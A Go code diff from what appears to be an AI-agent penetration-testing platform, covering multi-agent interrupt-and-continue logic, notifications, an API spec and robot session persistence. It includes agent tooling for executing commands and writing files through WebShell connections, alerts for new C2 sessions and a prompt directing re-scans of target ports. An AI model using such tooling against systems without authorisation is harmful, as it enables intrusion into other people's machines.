stopKeepalive := make(chan struct{})
|
||||
go sseKeepalive(c, stopKeepalive, &sseWriteMu)
|
||||
defer close(stopKeepalive)
|
||||
|
||||
var result *multiagent.RunResult
|
||||
var runErr error
|
||||
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
|
||||
if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil {
|
||||
var errorMsg string
|
||||
if errors.Is(err, ErrTaskAlreadyRunning) {
|
||||
@@ -152,47 +176,96 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
||||
sendEvent("error", errorMsg, nil)
|
||||
}
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errorMsg, assistantMessageID)
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errorMsg, time.Now(), assistantMessageID)
|
||||
}
|
||||
sendEvent("done", "", map[string]interface{}{"conversationId": conversationID})
|
||||
timeoutCancel()
|
||||
return
|
||||
}
|
||||
taskOwned = true
|
||||
|
||||
taskStatus := "completed"
|
||||
defer h.tasks.FinishTask(conversationID, taskStatus)
|
||||
// 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表
|
||||
var cumulativeMCPExecutionIDs []string
|
||||
|
||||
sendEvent("progress", "正在启动 Eino 多代理...", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
})
|
||||
for {
|
||||
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
|
||||
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
|
||||
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
|
||||
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
|
||||
})
|
||||
|
||||
stopKeepalive := make(chan struct{})
|
||||
go sseKeepalive(c, stopKeepalive, &sseWriteMu)
|
||||
defer close(stopKeepalive)
|
||||
result, runErr = multiagent.RunDeepAgent(
|
||||
taskCtxLoop,
|
||||
h.config,
|
||||
&h.config.MultiAgent,
|
||||
h.agent,
|
||||
h.logger,
|
||||
conversationID,
|
||||
curFinalMessage,
|
||||
curHistory,
|
||||
roleTools,
|
||||
progressCallback,
|
||||
h.agentsMarkdownDir,
|
||||
orch,
|
||||
chatReasoningToClientIntent(req.Reasoning),
|
||||
)
|
||||
timeoutCancel()
|
||||
|
||||
result, runErr := multiagent.RunDeepAgent(
|
||||
taskCtx,
|
||||
h.config,
|
||||
&h.config.MultiAgent,
|
||||
h.agent,
|
||||
h.logger,
|
||||
conversationID,
|
||||
prep.FinalMessage,
|
||||
prep.History,
|
||||
prep.RoleTools,
|
||||
progressCallback,
|
||||
h.agentsMarkdownDir,
|
||||
strings.TrimSpace(req.Orchestration),
|
||||
)
|
||||
if result != nil && len(result.MCPExecutionIDs) > 0 {
|
||||
cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
|
||||
}
|
||||
|
||||
if runErr == nil {
|
||||
break
|
||||
}
|
||||
|
||||
if runErr != nil {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
cause := context.Cause(baseCtx)
|
||||
if errors.Is(cause, multiagent.ErrInterruptContinue) {
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
note := h.tasks.TakeInterruptContinueNote(conversationID)
|
||||
icSummary := interruptContinueTimelineSummary(note)
|
||||
progressCallback("user_interrupt_continue", icSummary, map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"rawReason": strings.TrimSpace(note),
|
||||
"emptyReason": strings.TrimSpace(note) == "",
|
||||
"kind": "no_active_mcp_tool",
|
||||
})
|
||||
inject := formatInterruptContinueUserMessage(note)
|
||||
// 不写入 messages 表为 user 气泡:避免主对话流出现大段模板;说明已由 user_interrupt_continue 记入助手 process_details(迭代详情)。
|
||||
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
|
||||
curHistory = hist
|
||||
}
|
||||
curFinalMessage = inject
|
||||
sendEvent("progress", "已合并用户补充与最新轨迹,正在继续推理…", map[string]interface{}{
|
||||
"conversationId": conversationID,
|
||||
"source": "interrupt_continue",
|
||||
})
|
||||
h.tasks.UpdateTaskStatus(conversationID, "running")
|
||||
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
|
||||
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
|
||||
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
continue
|
||||
}
|
||||
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, result)
|
||||
}
|
||||
if errors.Is(cause, ErrTaskCancelled) {
|
||||
taskStatus = "cancelled"
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
cancelMsg := "任务已被用户取消,后续操作已停止。"
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", cancelMsg, assistantMessageID)
|
||||
if result != nil {
|
||||
if err := h.mergeAssistantMessagePartialOnCancel(assistantMessageID, result.Response); err != nil {
|
||||
h.logger.Warn("合并取消前的部分回复失败", zap.Error(err))
|
||||
}
|
||||
}
|
||||
if err := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); err != nil {
|
||||
h.logger.Warn("更新取消后的助手消息失败", zap.Error(err))
|
||||
}
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil)
|
||||
}
|
||||
sendEvent("cancelled", cancelMsg, map[string]interface{}{
|
||||
@@ -208,7 +281,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
timeoutMsg := "任务执行超时,已自动终止。"
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", timeoutMsg, assistantMessageID)
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", timeoutMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil)
|
||||
}
|
||||
sendEvent("error", timeoutMsg, map[string]interface{}{
|
||||
@@ -225,7 +298,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
errMsg := "执行失败: " + runErr.Error()
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errMsg, assistantMessageID)
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil)
|
||||
}
|
||||
sendEvent("error", errMsg, map[string]interface{}{
|
||||
@@ -237,17 +310,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
||||
}
|
||||
|
||||
if assistantMessageID != "" {
|
||||
mcpIDsJSON := ""
|
||||
if len(result.MCPExecutionIDs) > 0 {
|
||||
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
|
||||
mcpIDsJSON = string(jsonData)
|
||||
}
|
||||
_, _ = h.db.Exec(
|
||||
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
|
||||
result.Response,
|
||||
mcpIDsJSON,
|
||||
assistantMessageID,
|
||||
)
|
||||
_ = h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, cumulativeMCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
|
||||
}
|
||||
|
||||
if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
|
||||
@@ -261,7 +324,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
|
||||
effectiveOrch = config.NormalizeMultiAgentOrchestration(o)
|
||||
}
|
||||
sendEvent("response", result.Response, map[string]interface{}{
|
||||
"mcpExecutionIds": result.MCPExecutionIDs,
|
||||
"mcpExecutionIds": cumulativeMCPExecutionIDs,
|
||||
"conversationId": conversationID,
|
||||
"messageId": assistantMessageID,
|
||||
"agentMode": "eino_" + effectiveOrch,
|
||||
@@ -317,30 +380,23 @@ func (h *AgentHandler) MultiAgentLoop(c *gin.Context) {
|
||||
progressCallback,
|
||||
h.agentsMarkdownDir,
|
||||
strings.TrimSpace(req.Orchestration),
|
||||
chatReasoningToClientIntent(req.Reasoning),
|
||||
)
|
||||
if runErr != nil {
|
||||
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
||||
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
|
||||
h.persistEinoAgentTraceForResume(prep.ConversationID, result)
|
||||
}
|
||||
h.logger.Error("Eino DeepAgent 执行失败", zap.Error(runErr))
|
||||
errMsg := "执行失败: " + runErr.Error()
|
||||
if prep.AssistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errMsg, prep.AssistantMessageID)
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), prep.AssistantMessageID)
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": errMsg})
|
||||
return
|
||||
}
|
||||
|
||||
if prep.AssistantMessageID != "" {
|
||||
mcpIDsJSON := ""
|
||||
if len(result.MCPExecutionIDs) > 0 {
|
||||
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
|
||||
mcpIDsJSON = string(jsonData)
|
||||
}
|
||||
_, _ = h.db.Exec(
|
||||
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
|
||||
result.Response,
|
||||
mcpIDsJSON,
|
||||
prep.AssistantMessageID,
|
||||
)
|
||||
_ = h.db.UpdateAssistantMessageFinalize(prep.AssistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput))
|
||||
}
|
||||
|
||||
if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" {
|
||||
@@ -370,6 +426,52 @@ func (h *AgentHandler) persistEinoAgentTraceForResume(conversationID string, res
|
||||
}
|
||||
}
|
||||
|
||||
// mergeMCPExecutionIDLists 去重合并多段 Run 的 MCP execution id(顺序:先 dst 后 more)。
|
||||
func mergeMCPExecutionIDLists(dst []string, more []string) []string {
|
||||
seen := make(map[string]struct{}, len(dst)+len(more))
|
||||
out := make([]string, 0, len(dst)+len(more))
|
||||
add := func(ids []string) {
|
||||
for _, id := range ids {
|
||||
id = strings.TrimSpace(id)
|
||||
if id == "" {
|
||||
continue
|
||||
}
|
||||
if _, ok := seen[id]; ok {
|
||||
continue
|
||||
}
|
||||
seen[id] = struct{}{}
|
||||
out = append(out, id)
|
||||
}
|
||||
}
|
||||
add(dst)
|
||||
add(more)
|
||||
return out
|
||||
}
|
||||
|
||||
// interruptContinueTimelineSummary 时间线 / process_details 中展示的简短正文(完整模板已写入另一条用户消息)。
|
||||
func interruptContinueTimelineSummary(note string) string {
|
||||
note = strings.TrimSpace(note)
|
||||
if note == "" {
|
||||
return "用户选择「中断并继续」,未填写说明;已按默认渗透补充模板合并上下文并续跑。"
|
||||
}
|
||||
return "用户中断说明(原文):\n\n" + note
|
||||
}
|
||||
|
||||
// formatInterruptContinueUserMessage 将「中断并继续」弹窗中的说明格式化为新一轮 user 消息(渗透场景下强调路径补充与端口复扫)。
|
||||
func formatInterruptContinueUserMessage(note string) string {
|
||||
var b strings.Builder
|
||||
b.WriteString("【用户补充 / 中断后继续】\n")
|
||||
if s := strings.TrimSpace(note); s != "" {
|
||||
b.WriteString(s)
|
||||
b.WriteString("\n\n")
|
||||
}
|
||||
b.WriteString("【请在本轮落实】\n")
|
||||
b.WriteString("- 将用户提供的接口路径、参数、业务变化纳入后续测试与推理。\n")
|
||||
b.WriteString("- 若资产或目标信息有更新,请对目标重新执行端口/服务探测,再基于新结果规划下一步。\n")
|
||||
b.WriteString("- 在已有轨迹基础上推进,避免无意义重复已完成的步骤。\n")
|
||||
return strings.TrimSpace(b.String())
|
||||
}
|
||||
|
||||
func multiAgentHTTPErrorStatus(err error) (int, string) {
|
||||
msg := err.Error()
|
||||
switch {
|
||||
|
||||
@@ -55,13 +55,7 @@ func (h *AgentHandler) prepareMultiAgentSession(req *ChatRequest) (*multiAgentPr
|
||||
if getErr != nil {
|
||||
agentHistoryMessages = []agent.ChatMessage{}
|
||||
} else {
|
||||
agentHistoryMessages = make([]agent.ChatMessage, 0, len(historyMessages))
|
||||
for _, msg := range historyMessages {
|
||||
agentHistoryMessages = append(agentHistoryMessages, agent.ChatMessage{
|
||||
Role: msg.Role,
|
||||
Content: msg.Content,
|
||||
})
|
||||
}
|
||||
agentHistoryMessages = dbMessagesToAgentChatMessages(historyMessages)
|
||||
}
|
||||
}
|
||||
|
||||
@@ -73,12 +67,7 @@ func (h *AgentHandler) prepareMultiAgentSession(req *ChatRequest) (*multiAgentPr
|
||||
h.logger.Warn("WebShell AI 助手:未找到连接", zap.String("id", req.WebShellConnectionID), zap.Error(errConn))
|
||||
return nil, fmt.Errorf("未找到该 WebShell 连接")
|
||||
}
|
||||
remark := conn.Remark
|
||||
if remark == "" {
|
||||
remark = conn.URL
|
||||
}
|
||||
webshellContext := fmt.Sprintf("[WebShell 助手上下文] 当前连接 ID:%s,备注:%s。可用工具(仅在该连接上操作时使用,connection_id 填 \"%s\"):webshell_exec、webshell_file_list、webshell_file_read、webshell_file_write、record_vulnerability、list_knowledge_risk_types、search_knowledge_base。Skills 包请使用 Eino 多代理内置 `skill` 工具。\n\n用户请求:%s",
|
||||
conn.ID, remark, conn.ID, req.Message)
|
||||
webshellContext := BuildWebshellAssistantContext(conn, WebshellSkillHintMultiAgent, req.Message)
|
||||
// WebShell 模式下如果同时指定了角色,追加角色 user_prompt(工具集仍仅限 webshell 专用工具)
|
||||
if req.Role != "" && req.Role != "默认" && h.config != nil && h.config.Roles != nil {
|
||||
if role, exists := h.config.Roles[req.Role]; exists && role.Enabled && role.UserPrompt != "" {
|
||||
|
||||
@@ -38,6 +38,7 @@ type NotificationSummaryItem struct {
|
||||
VulnerabilityID string `json:"vulnerabilityId,omitempty"`
|
||||
ExecutionID string `json:"executionId,omitempty"`
|
||||
InterruptID string `json:"interruptId,omitempty"`
|
||||
SessionID string `json:"sessionId,omitempty"` // C2 会话(如新会话上线)
|
||||
}
|
||||
|
||||
// NotificationSummaryResponse 聚合响应
|
||||
@@ -239,6 +240,52 @@ func (h *NotificationHandler) loadVulnerabilityItems(sinceMs int64, limit int, e
|
||||
return items, counts, nil
|
||||
}
|
||||
|
||||
// loadC2SessionOnlineEvents 新会话上线(c2_events:session + critical,与 Manager.IngestCheckIn 一致)
|
||||
func (h *NotificationHandler) loadC2SessionOnlineEvents(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) {
|
||||
sinceSec := normalizedSinceSec(sinceMs)
|
||||
rows, err := h.db.Query(`
|
||||
SELECT id, message, COALESCE(session_id, ''),
|
||||
COALESCE(CAST(strftime('%s', created_at) AS INTEGER), 0)
|
||||
FROM c2_events
|
||||
WHERE category = 'session' AND level = 'critical'
|
||||
AND CAST(strftime('%s', created_at) AS INTEGER) > ?
|
||||
ORDER BY created_at DESC
|
||||
LIMIT ?
|
||||
`, sinceSec, limit)
|
||||
if err != nil {
|
||||
return nil, 0, err
|
||||
}
|
||||
defer rows.Close()
|
||||
items := make([]NotificationSummaryItem, 0, limit)
|
||||
for rows.Next() {
|
||||
var id, message, sessionID string
|
||||
var createdSec int64
|
||||
if err := rows.Scan(&id, &message, &sessionID, &createdSec); err != nil {
|
||||
continue
|
||||
}
|
||||
desc := strings.TrimSpace(message)
|
||||
if len(desc) > 220 {
|
||||
desc = desc[:200] + "…"
|
||||
}
|
||||
if desc == "" {
|
||||
desc = i18nText(english, "新会话已建立", "A new session was created")
|
||||
}
|
||||
items = append(items, NotificationSummaryItem{
|
||||
ID: "c2evt:" + id,
|
||||
Level: "p0",
|
||||
Type: "c2_session_online",
|
||||
Title: i18nText(english, "C2 新会话上线", "C2 new session online"),
|
||||
Desc: desc,
|
||||
Ts: unixSecToRFC3339(createdSec),
|
||||
Count: 1,
|
||||
Actionable: false,
|
||||
Read: false,
|
||||
SessionID: sessionID,
|
||||
})
|
||||
}
|
||||
return items, len(items), rows.Err()
|
||||
}
|
||||
|
||||
func (h *NotificationHandler) loadFailedExecutionItems(sinceMs int64, limit int, english bool) ([]NotificationSummaryItem, int, error) {
|
||||
sinceSec := normalizedSinceSec(sinceMs)
|
||||
rows, err := h.db.Query(`
|
||||
@@ -492,6 +539,7 @@ func normalizeMarkableEventID(id string) (string, bool) {
|
||||
"vuln:",
|
||||
"exec_failed:",
|
||||
"task_completed:",
|
||||
"c2evt:",
|
||||
}
|
||||
for _, prefix := range allowedPrefixes {
|
||||
if strings.HasPrefix(v, prefix) {
|
||||
@@ -593,12 +641,20 @@ func (h *NotificationHandler) GetSummary(c *gin.Context) {
|
||||
return
|
||||
}
|
||||
|
||||
c2OnlineItems, c2OnlineCount, err := h.loadC2SessionOnlineEvents(sinceMs, limit, english)
|
||||
if err != nil {
|
||||
h.logger.Warn("加载 C2 会话上线通知失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "failed to summarize c2 session events"})
|
||||
return
|
||||
}
|
||||
|
||||
longRunningItems, longRunningCount := h.summarizeLongRunningTasks(15*time.Minute, english)
|
||||
completedItems, completedCount := h.summarizeCompletedTasksSince(sinceMs, limit, english)
|
||||
|
||||
items := make([]NotificationSummaryItem, 0, len(hitlItems)+len(vulnItems)+len(longRunningItems)+len(completedItems))
|
||||
items := make([]NotificationSummaryItem, 0, len(hitlItems)+len(vulnItems)+len(c2OnlineItems)+len(longRunningItems)+len(completedItems))
|
||||
items = append(items, hitlItems...)
|
||||
items = append(items, vulnItems...)
|
||||
items = append(items, c2OnlineItems...)
|
||||
items = append(items, longRunningItems...)
|
||||
items = append(items, completedItems...)
|
||||
|
||||
@@ -636,6 +692,7 @@ func (h *NotificationHandler) GetSummary(c *gin.Context) {
|
||||
"failedExecutions": 0,
|
||||
"longRunningTasks": longRunningCount,
|
||||
"completedTasks": completedCount,
|
||||
"c2SessionOnline": c2OnlineCount,
|
||||
},
|
||||
Items: items,
|
||||
})
|
||||
|
||||
@@ -461,6 +461,14 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
|
||||
"type": "string",
|
||||
"description": "对话ID",
|
||||
},
|
||||
"reason": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "可选。与 MCP 监控页「终止并说明」一致:非空时合并进当前工具返回给模型的文本(含 USER INTERRUPT NOTE 块)",
|
||||
},
|
||||
"continueAfter": map[string]interface{}{
|
||||
"type": "boolean",
|
||||
"description": "为 true 时仅终止当前进行中的 MCP 工具调用(不取消整轮任务);须已有工具在执行,否则 400",
|
||||
},
|
||||
},
|
||||
},
|
||||
"AgentTask": map[string]interface{}{
|
||||
@@ -3318,6 +3326,55 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
|
||||
},
|
||||
},
|
||||
},
|
||||
"/api/monitor/execution/{id}/cancel": map[string]interface{}{
|
||||
"post": map[string]interface{}{
|
||||
"tags": []string{"监控"},
|
||||
"summary": "取消进行中的工具执行",
|
||||
"description": "对当前进程内正在执行的 MCP 工具调用发送 context 取消信号;上层对话/多步任务可继续。若执行已结束或未在本进程内运行则返回 404。",
|
||||
"operationId": "cancelExecution",
|
||||
"parameters": []map[string]interface{}{
|
||||
{
|
||||
"name": "id",
|
||||
"in": "path",
|
||||
"required": true,
|
||||
"description": "执行ID",
|
||||
"schema": map[string]interface{}{
|
||||
"type": "string",
|
||||
},
|
||||
},
|
||||
},
|
||||
"requestBody": map[string]interface{}{
|
||||
"required": false,
|
||||
"content": map[string]interface{}{
|
||||
"application/json": map[string]interface{}{
|
||||
"schema": map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"note": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "可选。非空时与工具已返回输出合并交给大模型,并带有「用户终止说明」标题块以便与命令行原文区分",
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
"responses": map[string]interface{}{
|
||||
"200": map[string]interface{}{
|
||||
"description": "已发送终止信号",
|
||||
},
|
||||
"400": map[string]interface{}{
|
||||
"description": "请求体不是合法 JSON",
|
||||
},
|
||||
"404": map[string]interface{}{
|
||||
"description": "未找到进行中的工具执行",
|
||||
},
|
||||
"401": map[string]interface{}{
|
||||
"description": "未授权",
|
||||
},
|
||||
},
|
||||
},
|
||||
},
|
||||
"/api/monitor/executions": map[string]interface{}{
|
||||
"delete": map[string]interface{}{
|
||||
"tags": []string{"监控"},
|
||||
|
||||
+99
-12
@@ -75,14 +75,58 @@ func (h *RobotHandler) sessionKey(platform, userID string) string {
|
||||
return platform + "_" + userID
|
||||
}
|
||||
|
||||
func (h *RobotHandler) loadSessionBinding(sk string) (convID, role string) {
|
||||
if h.db == nil || strings.TrimSpace(sk) == "" {
|
||||
return "", ""
|
||||
}
|
||||
binding, err := h.db.GetRobotSessionBinding(sk)
|
||||
if err != nil {
|
||||
h.logger.Warn("读取机器人会话绑定失败", zap.String("session_key", sk), zap.Error(err))
|
||||
return "", ""
|
||||
}
|
||||
if binding == nil {
|
||||
return "", ""
|
||||
}
|
||||
return binding.ConversationID, binding.RoleName
|
||||
}
|
||||
|
||||
func (h *RobotHandler) persistSessionBinding(sk, convID, role string) {
|
||||
if h.db == nil || strings.TrimSpace(sk) == "" || strings.TrimSpace(convID) == "" {
|
||||
return
|
||||
}
|
||||
if err := h.db.UpsertRobotSessionBinding(sk, convID, role); err != nil {
|
||||
h.logger.Warn("写入机器人会话绑定失败", zap.String("session_key", sk), zap.Error(err))
|
||||
}
|
||||
}
|
||||
|
||||
func (h *RobotHandler) deleteSessionBinding(sk string) {
|
||||
if h.db == nil || strings.TrimSpace(sk) == "" {
|
||||
return
|
||||
}
|
||||
if err := h.db.DeleteRobotSessionBinding(sk); err != nil {
|
||||
h.logger.Warn("删除机器人会话绑定失败", zap.String("session_key", sk), zap.Error(err))
|
||||
}
|
||||
}
|
||||
|
||||
// getOrCreateConversation 获取或创建当前会话,title 用于新对话的标题(取用户首条消息前50字)
|
||||
func (h *RobotHandler) getOrCreateConversation(platform, userID, title string) (convID string, isNew bool) {
|
||||
sk := h.sessionKey(platform, userID)
|
||||
h.mu.RLock()
|
||||
convID = h.sessions[h.sessionKey(platform, userID)]
|
||||
convID = h.sessions[sk]
|
||||
h.mu.RUnlock()
|
||||
if convID != "" {
|
||||
return convID, false
|
||||
}
|
||||
if persistedConvID, persistedRole := h.loadSessionBinding(sk); strings.TrimSpace(persistedConvID) != "" {
|
||||
// 会话绑定持久化:服务重启后也可恢复当前对话和角色。
|
||||
h.mu.Lock()
|
||||
h.sessions[sk] = persistedConvID
|
||||
if strings.TrimSpace(persistedRole) != "" {
|
||||
h.sessionRoles[sk] = persistedRole
|
||||
}
|
||||
h.mu.Unlock()
|
||||
return persistedConvID, false
|
||||
}
|
||||
t := strings.TrimSpace(title)
|
||||
if t == "" {
|
||||
t = "新对话 " + time.Now().Format("01-02 15:04")
|
||||
@@ -96,34 +140,49 @@ func (h *RobotHandler) getOrCreateConversation(platform, userID, title string) (
|
||||
}
|
||||
convID = conv.ID
|
||||
h.mu.Lock()
|
||||
h.sessions[h.sessionKey(platform, userID)] = convID
|
||||
role := h.sessionRoles[sk]
|
||||
h.sessions[sk] = convID
|
||||
h.mu.Unlock()
|
||||
h.persistSessionBinding(sk, convID, role)
|
||||
return convID, true
|
||||
}
|
||||
|
||||
// setConversation 切换当前会话
|
||||
func (h *RobotHandler) setConversation(platform, userID, convID string) {
|
||||
sk := h.sessionKey(platform, userID)
|
||||
h.mu.Lock()
|
||||
h.sessions[h.sessionKey(platform, userID)] = convID
|
||||
role := h.sessionRoles[sk]
|
||||
h.sessions[sk] = convID
|
||||
h.mu.Unlock()
|
||||
h.persistSessionBinding(sk, convID, role)
|
||||
}
|
||||
|
||||
// getRole 获取当前用户使用的角色,未设置时返回"默认"
|
||||
func (h *RobotHandler) getRole(platform, userID string) string {
|
||||
sk := h.sessionKey(platform, userID)
|
||||
h.mu.RLock()
|
||||
role := h.sessionRoles[h.sessionKey(platform, userID)]
|
||||
role := h.sessionRoles[sk]
|
||||
h.mu.RUnlock()
|
||||
if role == "" {
|
||||
return "默认"
|
||||
if strings.TrimSpace(role) != "" {
|
||||
return role
|
||||
}
|
||||
return role
|
||||
if _, persistedRole := h.loadSessionBinding(sk); strings.TrimSpace(persistedRole) != "" {
|
||||
h.mu.Lock()
|
||||
h.sessionRoles[sk] = persistedRole
|
||||
h.mu.Unlock()
|
||||
return persistedRole
|
||||
}
|
||||
return "默认"
|
||||
}
|
||||
|
||||
// setRole 设置当前用户使用的角色
|
||||
func (h *RobotHandler) setRole(platform, userID, roleName string) {
|
||||
sk := h.sessionKey(platform, userID)
|
||||
h.mu.Lock()
|
||||
h.sessionRoles[h.sessionKey(platform, userID)] = roleName
|
||||
h.sessionRoles[sk] = roleName
|
||||
convID := h.sessions[sk]
|
||||
h.mu.Unlock()
|
||||
h.persistSessionBinding(sk, convID, roleName)
|
||||
}
|
||||
|
||||
// clearConversation 清空当前会话(切换到新对话)
|
||||
@@ -140,7 +199,16 @@ func (h *RobotHandler) clearConversation(platform, userID string) (newConvID str
|
||||
|
||||
// HandleMessage 处理用户输入,返回回复文本(供各平台 webhook 调用)
|
||||
func (h *RobotHandler) HandleMessage(platform, userID, text string) (reply string) {
|
||||
platform = strings.TrimSpace(platform)
|
||||
userID = strings.TrimSpace(userID)
|
||||
text = strings.TrimSpace(text)
|
||||
if platform == "" {
|
||||
platform = "unknown"
|
||||
}
|
||||
if userID == "" {
|
||||
h.logger.Warn("机器人消息缺少用户标识,已拒绝处理", zap.String("platform", platform))
|
||||
return "无法识别发送者身份,请检查机器人事件订阅权限(需返回可用的用户 ID)。"
|
||||
}
|
||||
if text == "" {
|
||||
return "请输入内容或发送「帮助」/ help 查看命令。"
|
||||
}
|
||||
@@ -345,7 +413,9 @@ func (h *RobotHandler) cmdDelete(platform, userID, convID string) string {
|
||||
// 删除当前对话时,先清空会话绑定
|
||||
h.mu.Lock()
|
||||
delete(h.sessions, sk)
|
||||
delete(h.sessionRoles, sk)
|
||||
h.mu.Unlock()
|
||||
h.deleteSessionBinding(sk)
|
||||
}
|
||||
if err := h.db.DeleteConversation(convID); err != nil {
|
||||
return "删除失败: " + err.Error()
|
||||
@@ -647,8 +717,25 @@ func (h *RobotHandler) HandleWecomPOST(c *gin.Context) {
|
||||
h.logger.Debug("企业微信内层 XML 解析成功", zap.String("FromUserName", body.FromUserName), zap.String("Content", body.Content))
|
||||
}
|
||||
|
||||
userID := body.FromUserName
|
||||
tenantKey := strings.TrimSpace(enterpriseID)
|
||||
if tenantKey == "" {
|
||||
tenantKey = strings.TrimSpace(h.config.Robots.Wecom.CorpID)
|
||||
}
|
||||
if tenantKey == "" {
|
||||
tenantKey = "default"
|
||||
}
|
||||
rawUserID := strings.TrimSpace(body.FromUserName)
|
||||
replyUserID := rawUserID
|
||||
userID := ""
|
||||
if rawUserID != "" {
|
||||
userID = "t:" + tenantKey + "|u:" + rawUserID
|
||||
}
|
||||
text := strings.TrimSpace(body.Content)
|
||||
if userID == "" {
|
||||
h.logger.Warn("企业微信消息缺少可用用户标识,已忽略")
|
||||
c.String(http.StatusOK, "success")
|
||||
return
|
||||
}
|
||||
|
||||
// 限制回复内容长度(企业微信限制 2048 字节)
|
||||
maxReplyLen := 2000
|
||||
@@ -661,14 +748,14 @@ func (h *RobotHandler) HandleWecomPOST(c *gin.Context) {
|
||||
|
||||
if body.MsgType != "text" {
|
||||
h.logger.Debug("企业微信收到非文本消息", zap.String("MsgType", body.MsgType))
|
||||
h.sendWecomReply(c, userID, enterpriseID, limitReply("暂仅支持文本消息,请发送文字。"), timestamp, nonce)
|
||||
h.sendWecomReply(c, replyUserID, enterpriseID, limitReply("暂仅支持文本消息,请发送文字。"), timestamp, nonce)
|
||||
return
|
||||
}
|
||||
|
||||
// 文本消息:先判断是否为内置命令(如 帮助/列表/新对话 等),这类命令处理很快,可以直接走被动回复,避免依赖主动发送 API。
|
||||
if cmdReply, ok := h.handleRobotCommand("wecom", userID, text); ok {
|
||||
h.logger.Debug("企业微信收到命令消息,走被动回复", zap.String("userID", userID), zap.String("text", text))
|
||||
h.sendWecomReply(c, userID, enterpriseID, limitReply(cmdReply), timestamp, nonce)
|
||||
h.sendWecomReply(c, replyUserID, enterpriseID, limitReply(cmdReply), timestamp, nonce)
|
||||
return
|
||||
}
|
||||
|
||||
@@ -684,7 +771,7 @@ func (h *RobotHandler) HandleWecomPOST(c *gin.Context) {
|
||||
reply = limitReply(reply)
|
||||
h.logger.Debug("企业微信消息处理完成", zap.String("userID", userID), zap.String("reply", reply))
|
||||
